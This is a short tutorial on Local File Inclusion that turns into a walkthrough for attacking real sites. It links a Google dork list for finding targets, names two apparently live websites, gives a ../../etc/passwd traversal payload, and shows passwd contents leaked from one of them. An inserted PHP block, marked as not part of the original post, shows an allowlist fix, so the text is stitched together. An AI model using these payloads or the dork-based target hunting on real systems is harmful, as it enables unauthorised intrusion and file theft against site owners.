Local File Inclusion Vulnerability (LFI)
Through this vulnerability, an attacker can read arbitrary files from the server.
For example: reading back-end source code, configuration files, log files, etc.
This vulnerability arises when user-controllable input is used to include a file from the server without proper checks.
For example: http://test.com/index.php?page=contact.php
page=/etc/passwd
Most servers run Linux.
They have the confidential file /etc/passwd.
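The unchecked include described above, next to an allowlist-based fix, as an added example that is not part of the original post. The page names, the `PAGES` map, `resolve_page()` and the temporary demo directory are assumptions.

```php
<?php
// Added example; PAGES, resolve_page() and the demo directory are assumptions.

// Vulnerable pattern described in the post: the parameter goes straight to include.
//   include $_GET['page'];   // page=/etc/passwd is read from disk and echoed back

// Hardened form: the request only selects a key; the path never comes from the user.
const PAGES = [
    'contact'   => 'contact.php',
    'biography' => 'biography.php',
];

function resolve_page(string $requested, string $baseDir): ?string
{
    // Accept "contact" or "contact.php"; every other value fails the lookup.
    $key = preg_replace('/\.php$/', '', $requested);
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    if ($base === false || $path === false) {
        return null; // directory or page file is missing
    }
    // Defence in depth: the resolved file must still sit inside the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a throwaway pages directory and three request values.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'contact.php', "<?php echo 'contact page';\n");

foreach (['contact.php', '/etc/passwd', '../../../../etc/passwd'] as $req) {
    $file = resolve_page($req, $base);
    echo str_pad($req, 24), ' => ', $file === null ? 'rejected' : 'include ' . basename($file), "\n";
}

unlink($base . DIRECTORY_SEPARATOR . 'contact.php');
rmdir($base);
```

In the application itself, a null result should produce a 404 response, and `include` should only ever receive the path returned by `resolve_page()`.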
Google Dork : https://github.com/Hood3dRob1n/BinGoo/blob/master/dorks/LFI-dork.lst
Get your target site using a dork or any other way
Example : https://www.ravagedband.com/index.php?page=biography.php
Go to LFI → LFI cheat sheet → load any payload
Then press Enter
Got this: root:x:0:0:root:/root:/bin/false ravagedband.com:x:53224:53224:ravagedband.com:/home/ravagedband.com:/bin/false
Example site:
→ Did not work on the first attempt
→ Did not work
→ https://confituredebali.com/index.php?page=../../../../../../../../../../../../etc/passwd